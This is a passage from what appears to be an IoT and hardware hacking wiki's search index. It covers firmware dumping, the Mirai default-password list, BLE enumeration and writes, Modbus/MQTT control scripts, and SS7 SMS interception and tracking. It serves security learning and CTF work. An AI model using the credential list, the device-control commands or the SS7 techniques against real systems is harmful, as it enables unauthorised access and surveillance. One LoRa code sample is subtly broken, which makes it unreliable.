pins:</p> <p></p> <p>Connect to an ST-LINK v2:</p> <p></p>"},{"location":"gadgets/micro-bit/#openocd-profile","title":"OpenOCD profile","text":"<p>Official datasheet of the nRF51822:</p> <p>https://infocenter.nordicsemi.com/pdf/nRF51822_PS_v3.1.pdf</p> <p>Code section size:</p> <p></p> <p></p> <p>hex(1024*256) = 0x40000 => 0x00040000</p> <pre><code>init\nreset init\nhalt\ndump_image image.bin 0x00000000 0x00040000\nexit\n</code></pre> <pre><code>$ sudo openocd -f /home/maki/tools/hardware/openocd/tcl/interface/stlink-v2-1.cfg -f /home/maki/tools/hardware/openocd/tcl/target/nrf51.cfg -f dump_fw.cfg\n</code></pre>"},{"location":"gadgets/micro-bit/#python-code","title":"Python code","text":"<p>Content of <code>image.dd</code> file:</p> <pre><code>$ strings image.bin\n[...]\nmain.py# Add your Python code here. E.g.\nfrom microbit import *\nwhile True:\n display.scroll('Hello, World!')\n displa\ny.show(Image.HEART)\n sleep(1000)\n print(\"coucou\")\n sleep(2000)\n</code></pre>"},{"location":"gadgets/proxmark/","title":"Proxmark","text":""},{"location":"gadgets/proxmark/#_1","title":"Proxmark","text":"<p>TODO</p>"},{"location":"gadgets/proxmark/#references","title":"References","text":""},{"location":"gadgets/pwnagotchi/","title":"Pwnagotchi","text":"<p>Documentation: https://pwnagotchi.ai/</p> <p></p>"},{"location":"gadgets/raspberry-pi/","title":"Raspberry Pi","text":""},{"location":"gadgets/raspberry-pi/#gpio-header","title":"GPIO Header","text":""},{"location":"gadgets/raspberry-pi/#tools","title":"Tools","text":"<ul> <li>raspi-sec-tool - using Raspberry pi as hacking tool</li> </ul>"},{"location":"gadgets/raspberry-pi/#references","title":"References","text":"<ul> <li>Raspberry Pi As Poor Man\u2019s Hardware Hacking Tool - Arun-Magesh - December 14, 2018</li> <li>Hardware Hacking with a Raspberry Pi - Configuring the PiFex - voidstarsec - JULY 2024</li> </ul>"},{"location":"other/default-iot-passwords/","title":"Default IoT Passwords","text":"<p>IoT Device Default Password Lookup : https://www.defpass.com</p>"},{"location":"other/default-iot-passwords/#mirai-wordlist","title":"Mirai Wordlist","text":"<p>Seclist Mirai Wordlist : https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Malware/mirai-botnet.txt</p> <pre><code>root xc3511\nroot vizxv\nroot admin\nadmin admin\nroot 888888\nroot xmhdipc\nroot default\nroot jauntech\nroot 123456\nroot 54321\nsupport support\nroot (none)\nadmin password\nroot root\nroot 12345\nuser user\nadmin (none)\nroot pass\nadmin admin1234\nroot 1111\nadmin smcadmin\nadmin 1111\nroot 666666\nroot password\nroot 1234\nroot klv123\nAdministrator admin\nservice service\nsupervisor supervisor\nguest guest\nguest 12345\nadmin1 password\nadministrator 1234\n666666 666666\n888888 888888\nubnt ubnt\nroot klv1234\nroot Zte521\nroot hi3518\nroot jvbzd\nroot anko\nroot zlxx.\nroot 7ujMko0vizxv\nroot 7ujMko0admin\nroot system\nroot ikwb\nroot dreambox\nroot user\nroot realtek\nroot 000000\nadmin 1111111\nadmin 1234\nadmin 12345\nadmin 54321\nadmin 123456\nadmin 7ujMko0admin\nadmin pass\nadmin meinsm\ntech tech\nmother fucker\n</code></pre>"},{"location":"other/electronic-components/","title":"Electronic Components","text":""},{"location":"other/electronic-components/#resistors","title":"Resistors","text":""},{"location":"other/electronic-components/#capacitors","title":"Capacitors","text":""},{"location":"other/electronic-components/#transistors","title":"Transistors","text":""},{"location":"other/electronic-components/#inductors","title":"Inductors","text":""},{"location":"other/electronic-components/#integrated-circuit-ic-microchip","title":"Integrated Circuit (IC) microchip","text":""},{"location":"other/electronic-components/#microcontroller-unit-mcu","title":"Microcontroller Unit (MCU)","text":""},{"location":"other/electronic-components/#system-on-chip-soc","title":"System-on-Chip (SoC)","text":""},{"location":"other/electronic-components/#trusted-platform-module-tpm","title":"Trusted Platform Module (TPM)","text":""},{"location":"other/links-and-hardware-kits/","title":"Links & Hardware Kits","text":""},{"location":"other/links-and-hardware-kits/#hardware-challenges-ctf","title":"Hardware Challenges & CTF","text":"<ul> <li>BLE CTF</li> <li>Learning Bluetooth Hackery with BLE CTF</li> <li>BLUETOOTH LOW ENERGY CTF - WRITE UP ECLECTIC KOALA</li> <li>https://www.pentestpartners.com/security-blog/totally-pwning-the-tapplock-smart-lock/</li> <li>Damn Vulnerable IoT Device</li> <li>DVID - Damn Vulnerable IoT Device Challenges' writeup</li> <li>IoT Security - Hack the Damn : Vulnerable IoT Device - Arnaud COURTY - @vulcainreo</li> <li>findTheDatasheet - EN</li> <li>findTheDatasheet - FR</li> <li>defaultPassword - FR</li> <li>GreHack 2019: IOT Security: Hack The Damn Vulnerable IoT Device - Arnaud Courty</li> <li>Riscure CTF 3 (2017)</li> <li>Solving AVR reverse engineering challenge with radare2 - rhme2 Jumpy (reversing 100)</li> <li>Using UART / Serial to interact with an embedded device - rhme2 Setup</li> <li>SHA1 length extension attack on the Secure Filesystem - rhme2 Secure Filesystem (crypto 100)</li> <li>Start reverse engineering AVR - Memory Map and I/O Registers - rhme2 Reverse Engineering</li> <li>Defeat a stack cookie with bruteforce - rhme2 Photo manager (pwn 100)</li> <li>Format string exploit on an arduino - rhme2 Casino (pwn 150)</li> <li>Identifying UART and main() in an AVR firmware (ft. Zeta Two) part 1 - rhme2</li> <li>Riscure CTF 2 (2016)</li> <li>riscure embedded hardware CTF is over - loopback 0x03 - LiveOverflow - 3 march 2017</li> <li>rhme-2016 write-up Team HydraBus</li> <li>Riscure CTF 1 (2015)</li> <li>Reversing Raw Binary Firmware Files in Ghidra</li> <li>Dumper un Arduino - thanatos</li> <li>Dumping the Firmware from the device Using buspirate - Veera Babu</li> <li>Embedded/IoT Linux for Red-Blue Teams</li> <li>From printed circuits boards to exploits (PWNING IOT DEVICES LIKE A BOSS) @virtualabs | Hack in Paris '18-</li> </ul>"},{"location":"other/links-and-hardware-kits/#twitch-streaming","title":"Twitch & Streaming","text":"<ul> <li>Twitch - virtualabs</li> <li>Youtube - VirtuVOD - VOD of twitch.tv/virtualabs</li> <li>Youtube - WHID We Hack In Disguise</li> </ul>"},{"location":"other/links-and-hardware-kits/#books","title":"Books","text":"<ul> <li>IoT Penetration Testing Cookbook: Identify vulnerabilities and secure your smart devices - Aaron Guzman, Aditya Gupta - Nov. 29 2017</li> <li>The IoT Hacker's Handbook: A Practical Guide to Hacking the Internet of Things - Aditya Gupta - April 1 2019</li> <li>Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things - Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Woods</li> <li>Advanced Penetration Testing Hacking IoT - Richard Knowell - April 2 2019</li> </ul>"},{"location":"other/links-and-hardware-kits/#hardware-kits","title":"Hardware Kits","text":""},{"location":"protocols/bluetooth/","title":"Bluetooth","text":""},{"location":"protocols/bluetooth/#tools","title":"Tools","text":"<ul> <li>bettercap/bettercap</li> <li>expliot_framework/expliot</li> <li>hackgnar/bleah</li> <li>bluez/gatttool</li> <li>securing/gattacker</li> </ul>"},{"location":"protocols/bluetooth/#bluetooth-configuration","title":"Bluetooth configuration","text":"<p>Requirements and configuration for Kali Linux.</p> <pre><code>$ sudo apt-get install bluetooth blueman bluez\n$ sudo systemctl start bluetooth\n$ sudo hciconfig hci0 up\n</code></pre> <p>Enumerate Bluetooth devices</p> <pre><code>$ sudo hcitool lescan\n00:1A:7D:DA:71:06 Ph0wn Beacon\n25:55:84:20:73:70 (unknown)\n</code></pre> <p>[!CAUTION] <code>apt</code> doesn't have a recent version of bluez, recompile it with the following lines.</p> <pre><code>wget https://www.kernel.org/pub/linux/bluetooth/bluez-5.18.tar.xz\ndpkg --get-selections | grep -v deinstall | grep bluez\ntar xvf bluez-5.18.tar.xz\nsudo apt-get install libglib2.0-dev libdbus-1-dev libusb-dev libudev-dev libical-dev systemd libreadline-dev\n.configure --enable-library\nmake -j8 && sudo make install\nsudo cp attrib/gatttool /usr/local/bin/\n</code></pre>"},{"location":"protocols/bluetooth/#ble-enumerate-services-and-characteristics","title":"BLE - Enumerate services and characteristics","text":"<p>BLE is based on specification called General Attribute profile (GATT), that defines how communication/data transfer between client and server.</p> <ul> <li> <p>Using bettercap/bettercap <pre><code>sudo bettercap -eval \"net.recon off; events.stream off; ble.recon on\"\nble.show\nble.enum 04:52:de:ad:be:ef\n</code></pre></p> </li> <li> <p>Using expliot_framework/expliot <pre><code># List of Services\nrun ble.generic.scan -a <mac address> -s\n# List of characteristics\nrun ble.generic.scan -a <mac address> -c\n</code></pre></p> </li> <li> <p>Using hackgnar/bleah <pre><code>sudo bleah -b $MAC -e\n</code></pre></p> </li> </ul> <p>Using bluez/gatttool, we can enumerate the services and their characteristics, use <code>sudo gatttool -b $MAC -I</code> to have an interactive gatttool shell:</p> <ul> <li>Services: They are set of provided features and associated behaviors to interact with the peripheral. Each service contains a collection of characteristics.</li> <li>Characteristics: Characteristics are defined attribute types that contain a single logical value</li> </ul> <pre><code>MAC=30:AE:A4:2A:54:8A\n\n$ gatttool -b $MAC --primary\nattr handle = 0x0001, end grp handle = 0x0005 uuid: 00001801-0000-1000-8000-00805f9b34fb\nattr handle = 0x0014, end grp handle = 0x001c uuid: 00001800-0000-1000-8000-00805f9b34fb\nattr handle = 0x0028, end grp handle = 0xffff uuid: 000000ff-0000-1000-8000-00805f9b34fb\n# Services whose UUID start with 00001801 and 00001800 are special values defined in the norm\n# The other is a custom one which holds the CTF\n\n$ gatttool -b $MAC --characteristics\nhandle = 0x0002, char properties = 0x20, char value handle = 0x0003, uuid = 00002a05-0000-1000-8000-00805f9b34fb\nhandle = 0x0015, char properties = 0x02, char value handle = 0x0016, uuid = 00002a00-0000-1000-8000-00805f9b34fb\n</code></pre>"},{"location":"protocols/bluetooth/#ble-read-data","title":"BLE - Read data","text":"<p>Read data with gatttool</p> <pre><code>$ sudo gatttool -b $MAC -I\n[00:1A:7D:DA:71:06][LE]> connect\n</code></pre> <ul> <li> <p>List characteristics</p> <pre><code>[00:1A:7D:DA:71:06][LE]> characteristics\nhandle: 0x000b, char properties: 0x0a, char value handle: 0x000c, uuid: 4b796c6f-5265-6e49-7342-61644a656469\n</code></pre> </li> <li> <p>Read characteristic at char handle</p> <pre><code>[00:1A:7D:DA:71:06][LE]> char-read-hnd 0x000c\nCharacteristic value/descriptor: 44 65 63 72 79 70 74 20 74 68 65 20 6d 65 73 73 61 67 65 2c 20 77 72 69 74 65 20 74 68 65 20 64 65 63 72 79 70 74 65 64 20 76 61 6c 75 65 20 61 6e 64 20 72 65 61 64 20 62 61 63 6b 20 74 68 65 20 72 65 73 70 6f 6e 73 65 20 74 6f 20 66 6c 61 67 2e 20 45 6e 63 72 79 70 74 65 64 20 6d 65 73 73 61 67 65 3a 20 63 34 64 33 32 38 36 35 37 61 39 64 62 33 64 66 65 39 31 64 33 36 36 36 62 39 34 31 62 33 36 31\n</code></pre> </li> </ul> <p>One liner to read a characteristic</p> <pre><code>$ gatttool -b $MAC --char-read -a 0x002a|awk -F':' '{print $2}'|tr -d ' '|xxd -r -p;printf '\\n'\n</code></pre>"},{"location":"protocols/bluetooth/#ble-read-notificationindication","title":"BLE - Read notification/indication","text":"<pre><code>$ gatttool -b $MAC -a 0x0040 --char-write-req --value=0100 --listen\n$ gatttool -b $MAC -a 0x0044 --char-write-req --value=0200 --listen\n</code></pre>"},{"location":"protocols/bluetooth/#ble-write-data","title":"BLE - Write data","text":"<ul> <li> <p>Using bettercap/bettercap <pre><code>ble.recon on\nble.write 04:52:de:ad:be:ef 234bfbd5e3b34536a3fe723620d4b78d ffffffffffffffff\n</code></pre></p> </li> <li> <p>Using bluez/gatttool <pre><code>$ gatttool -b $MAC --char-write-req -a 0x002c -n $(echo -n \"12345678901234567890\"|xxd -ps)\n\n# With char-write, we perform a Write Command and don't expect a response from the server\n# With char-write-req, we perform a Write Request and expect a response from the server\n$ gatttool -b $MAC -a 0x0050 --char-write-req --value=$(echo -n 'hello' | xxd -p)\n\n# inside gatttool shell\n[00:1A:7D:DA:71:06][LE]> char-write-req 0x000c 476f6f64205061646177616e21212121\n[00:1A:7D:DA:71:06][LE]> char-read-hnd 0x000c\nCharacteristic value/descriptor: 43 6f 6e [...] 2e\n</code></pre></p> </li> </ul>"},{"location":"protocols/bluetooth/#bluetooth-mac","title":"Bluetooth MAC","text":"<p>Change the Bluetooth MAC address</p> <pre><code>$ bdaddr -r 11:22:33:44:55:66\n$ gatttool -I -b E8:77:6D:8B:09:96 -t random\n</code></pre>"},{"location":"protocols/bluetooth/#sniff-bluetooth-communication","title":"Sniff Bluetooth communication","text":""},{"location":"protocols/bluetooth/#using-ubertooth","title":"Using Ubertooth","text":"<p> You need 3 ubertooth.</p> <pre><code>ubertooth-btle -U 0 -A 37 -f -c bulb_37.pcap\nubertooth-btle -U 1 -A 38 -f -c bulb_38.pcap\nubertooth-btle -U 2 -A 39 -f -c bulb_39.pcap\n</code></pre>"},{"location":"protocols/bluetooth/#using-microbit","title":"Using Micro::Bit","text":"<ul> <li>WEAPONIZING THE BBC MICRO:BIT - DAMIEN CAUQUIL / VIRTUALABS - DEF CON 25 - JULY 28, 2017</li> </ul>"},{"location":"protocols/bluetooth/#using-android-hci","title":"Using Android HCI","text":"<p>Enable the Bluetooth HCI log on the device via Developer Options.</p> <p>It works like a hook in the stack to capture all the HCI packets in a file. For most Android devices, the log file is at <code>/sdcard/btsnoop_hci.log</code> or <code>/sdcard/oem_log/btsnoop/</code></p> <pre><code>$ adb devices\n$ adb pull /sdcard/oem_log/btsnoop/<your log file>.log\n$ adb pull /sdcard/btsnoop_hci.log\n$ adb bugreport filename\n</code></pre>"},{"location":"protocols/bluetooth/#challenges","title":"Challenges","text":"<ul> <li>BLE HackMe - works with nRF Connect (Android), </li> <li>hackgnar/ble_ctf - A Bluetooth low energy capture the flag</li> </ul>"},{"location":"protocols/bluetooth/#references","title":"References","text":"<ul> <li>A Practical Introduction to Bluetooth Low Energy security without any special hardware - Slawomir Jasek - 19 November 2020</li> <li>Denial of Pleasure: Attacking Unusual BLE Targets with a Flipper Zero - Matteo Mandolini & Luca Bongiorni</li> <li>BLE CTF - wiki.elvis.science - Embedded Lab Vienna for IOT & Security</li> <li>BLUETOOTH LOW ENERGY CTF - WRITE UP - ECLECTIC KOALA</li> <li>BLECTF, a \"Capture The Flag\" hardware platform based on Bluetooth Low Energy BLE + Write-Up - Hacker de Cabecera febrero 04, 2020</li> </ul>"},{"location":"protocols/can/","title":"CAN Bus","text":"<p>The Controller Area Network (CAN) bus is a high-integrity serial communication protocol designed for real-time data exchange in embedded systems, particularly in automotive and industrial applications. It operates on a multi-master, message-oriented architecture, allowing multiple devices (nodes) to communicate on the same network without a central controller.</p>"},{"location":"protocols/can/#interact","title":"Interact","text":"<pre><code>pip install python-can\npip install python-can-utils\n</code></pre> <pre><code>import can\nbus = can.Bus()\nwhile True:\n msg = can.Message(3, data=[0 for _ in range(8)])\n bus.send(msg)\n</code></pre> <ul> <li>Tbruno25/can-explorer - Visualize CAN Bus messages in real time </li> </ul>"},{"location":"protocols/can/#uds","title":"UDS","text":"<p>Unified Diagnostic Services (UDS) is a communication protocol used in automotive Electronic Control Units (ECUs) to enable diagnostics, firmware updates, routine testing and more.</p>"},{"location":"protocols/can/#implementation","title":"Implementation","text":"<ul> <li>pylessard/python-udsoncan - Python implementation of UDS (ISO-14229) standard.</li> <li>driftregion/iso14229 - C implementation of ISO 14229 (UDS) server and client for embedded systems</li> </ul>"},{"location":"protocols/can/#sid","title":"SID","text":"UDS SID (Request) UDS SID (Response) UDS Service Details 0x10 0x50 Diagnostic session control Control which UDS services are available. 0x11 0x51 ECU Reset It resets the ECU (includes hard reset, key off and soft reset) 0x27 0x67 Security access It enables use of security critical services via authentication. 0x28 0x68 Communication control This field turns send/receive of messages ON or OFF in the ECU. 0x29 0x69 Aunthentication Enables more advanced authentication vs. 0x27 (PKI based exchange). 0x3E 0x7E Tester present Send a heartbeat message periodically to remain in existing session . 0x83 0xC3 Access timing parameters View/Modify timing parameters used in client/server communication. 0x84 0xC4 Secured Data Transmission Send encrypted data via ISO 15764 (extended data link security) 0x85 0xC5 Control DTC Settings Enable/Disable detection of errors (e.g. used during diagnostics) 0x86 0xC6 Response On Event Request that ECU processes a service request if an event happens 0x87 0xC7 Link Control Set the baud rate for diagnostic access 0x22 0x62 Read Data by Identifier Read data from targetted ECU - e.g. VIN, sensor data etc. 0x23 0x63 Read Data by Address Read data from physical memory (e.g. to understand software behaviour) 0x24 0x64 Read Scaling Data By Identifier Read information about how to scale data identifiers 0x2A 0x6A Read Data by Identifier Periodic Request ECU to broadcast sensor data at slow/medium/fast/stop rate 0x2C 0x6C Dynamically Define Data Identifier Define data parameter for use in 0x22 or 0x2A dynamically 0x2E 0x6E Write Data By Identifier Program specific variables determined by data parameters 0x3D 0x7D Write Memory By address Write information to the ECU's memory 0x14 0x54 Clear Diagnostic Information Delete stored DTCs 0x19 0x59 Read DTC Information Read stored DTCs as well as related information 0x2F 0x6F Input Output Control By Identifier Gain control over ECU analog/digital inputs/outputs 0x31 0x71 Routine Control Initiate/stop routines (e.g. self testing, erasing of flash memory) 0x34 0x74 Request Download Start request to add software/data to ECU (including location/size) 0x35 0x75 Request Upload Start request to read software/data from ECU (including location/size) 0x36 0x76 Transfer Data Perform actual transfer of data following use of 0x74/0x75 0x37 0x77 Request Transfer Exit Stop the transfer of data 0x38 0x78 Request File Transfer Perform a file download/upload to/from the ECU 0x7F Negative Response Send with a negative response code when a request can not be handled."},{"location":"protocols/can/#references","title":"References","text":"<ul> <li>Awesome CAN bus tools, hardware and resources - iDoka</li> <li>UDS SID Table | UDS SID Request And Response - rfwireless-world</li> <li>UDS Explained - A Simple Intro (Unified Diagnostic Services) - csselectronics</li> <li>Unified Diagnostic Services (UDS) Explained - A Simple Intro [2022] - csselectronics</li> </ul>"},{"location":"protocols/dnp3/","title":"DNP3","text":""},{"location":"protocols/dnp3/#discovery","title":"Discovery","text":"<p>DNP3 Clients</p> <ul> <li>DNP3 Client Master Simulator</li> <li>DNP3 Simulator</li> </ul> <p>DNP3 Nmap Script</p> <p>Source: dnp3-enumerate.nse</p> <pre><code>nmap -sT --script dnp3-enumerate.nse -p 20000 <target_ip>\n</code></pre>"},{"location":"protocols/dnp3/#traffic-generation","title":"Traffic Generation","text":"<ul> <li>DNP3 Crafter</li> </ul>"},{"location":"protocols/gps/","title":"GPS","text":"<p>TODO</p>"},{"location":"protocols/http/","title":"HTTP","text":"<ul> <li>HTTPS Proxy: Burp Suite, MITM Proxy, Fiddler</li> <li>Network Sniffer: Wireshark, tcpdump</li> </ul>"},{"location":"protocols/i2c/","title":"I2C","text":"<p>I2C (Inter-Integrated Circuit), pronounced \"I-squared-C\" or \"I-two-C\", is a popular communication protocol mainly used for low-speed, short-distance communication in embedded systems.</p>"},{"location":"protocols/i2c/#analysis","title":"Analysis","text":"<p> Enable I2C on the Raspberry Pi via <code>raspi-config</code></p> <ul> <li> <p>i2c-tools <pre><code>sudo apt-get install i2c-tools\ni2cdetect -y 1\n</code></pre></p> </li> <li> <p>eeprog <pre><code>wget http://darkswarm.org/eeprog-0.7.6-tear5.tar.gz\ntar -xvf eeprog-0.7.6-tear5.tar.gz eeprog-0.7.6-tear12/\ncd eeprog-0.7.6-tear12/\nmake\nsudo make install\n</code></pre></p> </li> <li> <p>HydraBus <pre><code>i2c1> show pins\ni2c1> scan\n</code></pre></p> </li> </ul>"},{"location":"protocols/i2c/#read-write","title":"Read / Write","text":"<ul> <li>Read: <code>./eeprog -x /dev/i2c-1 0x50 -16 -r 0x00:0x10</code></li> <li>Write: <code>echo \"hello\" | ./eeprog -f -16 -w 0 -t 5 /dev/i2c-1 0x50</code></li> </ul>"},{"location":"protocols/i2c/#references","title":"References","text":"<ul> <li>How to Scan and Detect I2C Addresses - Carter Nelson</li> </ul>"},{"location":"protocols/lora/","title":"LoRa","text":""},{"location":"protocols/lora/#lora-with-arduino-on-8681mhz","title":"LoRa with Arduino on 868.1MHZ","text":"<p>arduino-LoRa\\ use 868.1MHZ with SpreadFactor 10</p> <pre><code>#include <SPI.h>\n#include <LoRa.h>\n\nvoid setup() {\n Serial.begin(9600);\n while (!Serial);\n\n Serial.println(\"LoRa Receiver\");\n\n if (!LoRa.begin(868.1E6)) {\n Serial.println(\"Starting LoRa failed!\");\n while (1);\n }\n LoRa.setSpreadingFactor(10);\n}\n\nvoid onReceive(int packetSize) {\n\n Serial.print(\"packet recv\\n\");\n // read packet\n for (int i = 0; i < packetSize; i++) {\n Serial.print((char)LoRa.read());\n }\n}\n\nvoid loop() {\n LoRa.receive();\n LoRa.onReceive(onReceive); \n}\n</code></pre>"},{"location":"protocols/lora/#bruteforce-all-the-eu-frequencies-and-the-spreadfactor","title":"Bruteforce all the EU frequencies and the SpreadFactor","text":"<pre><code>#include <SPI.h>\n#include <LoRa.h>\n\nfloat freq[5] = { 868.3E6, 868.5E6, 867.1E6, 867.5E6, 867.7E6, 867.9E6 }; \n\nvoid setup() {\n Serial.begin(9600);\n while (!Serial);\n\n Serial.println(\"LoRa Receiver\");\n\n if (!LoRa.begin(868.1E6)) {\n Serial.println(\"Starting LoRa failed!\");\n while (1);\n }\n LoRa.setSpreadingFactor(10);\n}\n\nvoid onReceive(int packetSize) {\n\n Serial.print(\"packet recv\\n\");\n // read packet\n for (int i = 0; i < packetSize; i++) {\n Serial.print((char)LoRa.read());\n }\n}\n\nvoid loop() {\n\n LoRa.receive();\n LoRa.onReceive(onReceive);\n delay(5000);\n While(1) {\n int i;\n for(i=0; i < 5 ; i++)\n {\n\n LoRa.setFrequency(freq[i]);\n int j;\n for(j=7; j <= 12; j++)\n {\n\n // loop on spreading factor is finish, set new freq\n LoRa.setSpreadingFactor(i);\n delay(5000);\n }\n }\n }\n}\n</code></pre>"},{"location":"protocols/lora/#display-rssi-of-the-packet","title":"Display RSSI of the packet","text":"<p>The Received Signal Strength Indication (RSSI) is the received signal power in milliwatts and is measured in dBm.</p> <p>The RSSI is measured in dBm and is a negative value.\\ The closer to 0 the better the signal is.</p> <p>Typical LoRa RSSI values are:</p> <ul> <li>RSSI minimum = -120 dBm.</li> <li>If RSSI=-30dBm: signal is strong.</li> <li>If RSSI=-120dBm: signal is weak.</li> </ul> <pre><code>#include <SPI.h>\n#include <LoRa.h>\n\nvoid setup() {\n Serial.begin(9600);\n while (!Serial);\n\n Serial.println(\"LoRa Receiver\");\n\n if (!LoRa.begin(867.1E6)) {\n Serial.println(\"Starting LoRa failed!\");\n while (1);\n }\n LoRa.setSpreadingFactor(8);\n}\n\nvoid onReceive(int packetSize) {\n Serial.print(\"packet recv\\n\");\n int rssi = LoRa.packetRssi();\n Serial.print(rssi);\n}\n\nvoid loop() {\n LoRa.receive();\n LoRa.onReceive(onReceive);\n delay(1000);\n}\n</code></pre>"},{"location":"protocols/mms/","title":"MMS (IEC 61850)","text":""},{"location":"protocols/mms/#discovery","title":"Discovery","text":"<p>MMS Client</p> <ul> <li>Lib 61850</li> <li>IEC 61850 Open Server</li> </ul> <p>MMS Discovery Nmap Script</p> <p>Source: mms-identify.nse</p> <pre><code>nmap -d --script mms-identify.nse --script-args='mms-identify.timeout=500' -p 102 <target_host>\n</code></pre>"},{"location":"protocols/mms/#explore-mms","title":"Explore MMS","text":"<ul> <li>MMS Client Example</li> <li>MMS Server Example</li> </ul>"},{"location":"protocols/mms/#fuzzing-mms","title":"Fuzzing MMS","text":"<ul> <li>61850-fuzzing </li> </ul>"},{"location":"protocols/modbus/","title":"Modbus","text":""},{"location":"protocols/modbus/#discovery","title":"Discovery","text":"<p>Modbus Client: </p> <ul> <li>QModBus</li> <li>pymodbus</li> <li>Modbus Tools </li> </ul> <p>Modbus Discover Nmap Script:</p> <pre><code>nmap --script modbus-discover.nse --script-args='modbus-discover.aggressive=true' -p 502 <host>\n</code></pre> <p>Connect to Modbus Slave:</p> <pre><code>from pymodbus.client import ModbusTcpClient\n\nclient = ModbusTcpClient('<IP_Address_of_Target>')\nclient.write_coil(1, True)\nresult = client.read_coils(1,1)\nprint(result.bits[0])\nclient.close()\n</code></pre> <p>Modbus Pentesting:</p> <ul> <li>smod</li> </ul> <p>Modbus Slave Simulator</p> <ul> <li>Diagslave </li> <li>ModbusPal </li> </ul> <p>Modbus Master Simulator</p> <ul> <li>modpoll</li> </ul>"},{"location":"protocols/mqtt/","title":"MQTT","text":""},{"location":"protocols/mqtt/#discovery","title":"Discovery","text":"<p>MQTT client:</p> <ul> <li>mqtt-spy</li> <li>MQTT CLI</li> <li>MQTT Lens</li> <li>MQTT.fx</li> <li>mosquitto_tools</li> </ul> <p>Scan an MQTT with nmap : <code>nmap -p 1883 -vvv --script=mqtt-subscribe -d sensors.domain.com</code></p> <pre><code>mosquitto_sub -h sensors.domain.com -t '#'\nmosquitto_sub -h sensors.domain.com -t '+'\nmosquitto_sub -h sensors.domain.com -t \"/sensor/\"\n</code></pre>"},{"location":"protocols/mqtt/#explore-mqtt","title":"Explore MQTT","text":"<p>Connect and subscribe to every topics using the <code>#</code> keyword.</p> <pre><code>import paho.mqtt.client as mqtt\ndef on_connect(client, userdata, flags, rc):\n print \"[+] Connection successful\"\n client.subscribe('#', qos = 1) # Subscribe to all topics\n client.subscribe('$SYS/#') # Broker Status (Mosquitto)\ndef on_message(client, userdata, msg):\n print '[+] Topic: %s - Message: %s' % (msg.topic, msg.payload)\nclient = mqtt.Client(client_id = \"MqttClient\")\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.connect('SERVER IP HERE', 1883, 60)\nclient.loop_forever()\n</code></pre> <p>Send MQTT requests</p> <pre><code>import paho.mqtt.client as mqtt\ndef on_connect(client, userdata, flags, rc):\n print \"[+] Connection success\"\nclient = mqtt.Client(client_id = \"MqttClient\")\nclient.on_connect = on_connect\nclient.connect('IP SERVER HERE', 1883, 60)\nclient.publish('smarthouse/garage/door', \"{'open':'true'}\")\n</code></pre>"},{"location":"protocols/mqtt/#mqtt-fuzzing","title":"MQTT Fuzzing","text":"<ul> <li>MQTT-Fuzz</li> </ul>"},{"location":"protocols/ntag215-amiibo/","title":"NFC - Amiibo","text":"<p>Amiibo are small figurines or cards produced by Nintendo that contain Near Field Communication (NFC) chips. These chips allow the Amiibo to interact with various Nintendo gaming systems, such as the Wii U, Nintendo 3DS, and Nintendo Switch.</p>"},{"location":"protocols/ntag215-amiibo/#tools","title":"Tools","text":"<ul> <li>socram8888/amiitool - Reverse-engineered amiibo cryptography</li> </ul>"},{"location":"protocols/ntag215-amiibo/#amiibo-encryption","title":"Amiibo Encryption","text":"<p>Nintendo added their own layer of encryption and digital signing to increase security. The digital signing prevents you from blindly altering the game data bytes because then the signature will no longer match. Additionally, the signature is also based on the UID of the tag, so you can't simply copy the bytes from an Amiibo to a blank NTAG215 to clone it.</p>"},{"location":"protocols/ntag215-amiibo/#password-reverse-engineering","title":"Password Reverse Engineering","text":"<p>The password is derived from the 7-byte tag UID (Unique Identifier) of the Amiibo. The algorithm used to generate the password is as follows:</p> <pre><code>password[0] = 0xAA ^ (uid[1] ^ uid[3])\npassword[1] = 0x55 ^ (uid[2] ^ uid[4])\npassword[2] = 0xAA ^ (uid[3] ^ uid[5])\npassword[3] = 0x55 ^ (uid[4] ^ uid[6])\n</code></pre> <p>The algorithm takes specific bytes of the UID, performs XOR operations with constant values (0xAA and 0x55), and combines them to form the 32-bit password.</p>"},{"location":"protocols/ntag215-amiibo/#references","title":"References","text":"<ul> <li>Reverse Engineering Nintendo Amiibo (NFC Toy) - Apr 27, 2020 - Kevin Brewster</li> <li>Amiibo encryption reverse-engineering - Apr 11, 2015 - Marcos Del Sol Vives</li> </ul>"},{"location":"protocols/signaling-system-7/","title":"SS7 - Signaling System No. 7","text":""},{"location":"protocols/signaling-system-7/#tools","title":"Tools","text":"<ul> <li>P1sec/SigFW - Open Source Signaling Firewall for SS7, Diameter filtering, antispoof and antisniff</li> <li>0xc0decafe/ss7MAPer - SS7 MAP (pen-)testing toolkit</li> <li>SigPloiter/SigPloit - SigPloit: Telecom Signaling Exploitation Framework - SS7, GTP, Diameter & SIP</li> </ul>"},{"location":"protocols/signaling-system-7/#sms-2fa-interception","title":"SMS 2FA Interception","text":"<p>SS7 plays a part in the transportation of SMS messages. An attacker may be able to register a victims <code>MSISDN</code> (mobile number) on a fake <code>MSC</code> (Mobile Switching Centre), the victims operator's <code>HLR</code> (Home Location Register) that works as a kind of telephone directory for <code>MSISDNs</code>, operators and SMS service centres (<code>SMSC</code>) will set the new location for the Victim\u2019s <code>MSISDN</code>.</p> <p>When, for this example the victims Bank sends them a 2FA authentication token the MSC transfers the SMS to the <code>SMSC</code> the real <code>MSMSC</code> asks the victims operator's <code>HLR</code> for the victims location, the <code>HLR</code> replies with the attacker operated <code>MSC</code>. The real operator's <code>SMSC</code> transfers the SMS to the fake <code>MSC</code> operated by the attack.</p>"},{"location":"protocols/signaling-system-7/#sms-spoofing","title":"SMS Spoofing","text":"<p>One of the simplest and most accessible attacks is SMS spoofing, which doesn't require direct access to the SS7 network. Many people are unaware that the \"from\" field in an SMS message lacks authentication, allowing it to be easily forged. The sender can insert any alphanumeric word into the \"from\" section of a message.</p> <p>SMS spoofing attacks can be carried out with minimal cost by using an SMS gateway service, many of which are accessible on the clear web. According to SOS Intelligence, most of these services lack abuse monitoring or prevention mechanisms. As a result, it\u2019s possible to send spoofed messages to a victim\u2014much like phishing emails\u2014prompting them to take action, often at little to no cost.</p>"},{"location":"protocols/signaling-system-7/#location-tracking","title":"Location Tracking","text":"<p>Within the SS7 network of a network operator it may be possible to request the <code>LAC</code> (Location Area Code) and <code>Cell ID</code> and with that information get a reasonably good location for a victim. However, this may require 